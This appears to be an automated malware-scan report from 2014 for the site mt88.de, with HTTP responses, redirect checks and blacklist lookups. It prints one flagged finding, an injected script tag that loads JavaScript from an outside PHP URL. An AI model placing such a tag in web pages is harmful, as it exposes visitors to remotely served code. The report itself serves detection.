Scanned pages/files
Request | Server response | Status |
http://mt88.de/ | HTTP/1.1 200 OK Connection: close Date: Sat, 05 Jul 2014 09:36:57 GMT Accept-Ranges: bytes ETag: "506c8e-7ee-4f0659e51d1e6" Server: Apache Vary: negotiate,Accept-Encoding Content-Length: 2030 Content-Location: index.htm.htm Content-Type: text/html Last-Modified: Mon, 20 Jan 2014 11:59:05 GMT TCN: choice | clean |
http://mt88.de/index.htm.htm | 200 OK Content-Length: 2030 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://alleinsein-ist-doof.de/5OUJoGS0.php?id=53446924" type="text/javascript"></script> | ||
http://mt88.de/perl_klein.jpg | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://mt88.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mt88.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 09:36:57 GMT
Accept-Ranges: bytes
ETag: "506c8e-7ee-4f0659e51d1e6"
Server: Apache
Vary: negotiate,Accept-Encoding
Content-Length: 2030
Content-Location: index.htm.htm
Content-Type: text/html
Last-Modified: Mon, 20 Jan 2014 11:59:05 GMT
TCN: choice
...2030 bytes of data.
GET / HTTP/1.1
Host: mt88.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 09:36:57 GMT
Accept-Ranges: bytes
ETag: "506c8e-7ee-4f0659e51d1e6"
Server: Apache
Vary: negotiate,Accept-Encoding
Content-Length: 2030
Content-Location: index.htm.htm
Content-Type: text/html
Last-Modified: Mon, 20 Jan 2014 11:59:05 GMT
TCN: choice
...2030 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mt88.de
Referer: http://www.google.com/search?q=mt88.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mt88.de
Referer: http://www.google.com/search?q=mt88.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mt88.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mt88.de/
Result: mt88.de is not infected or malware details are not published yet.
Result: mt88.de is not infected or malware details are not published yet.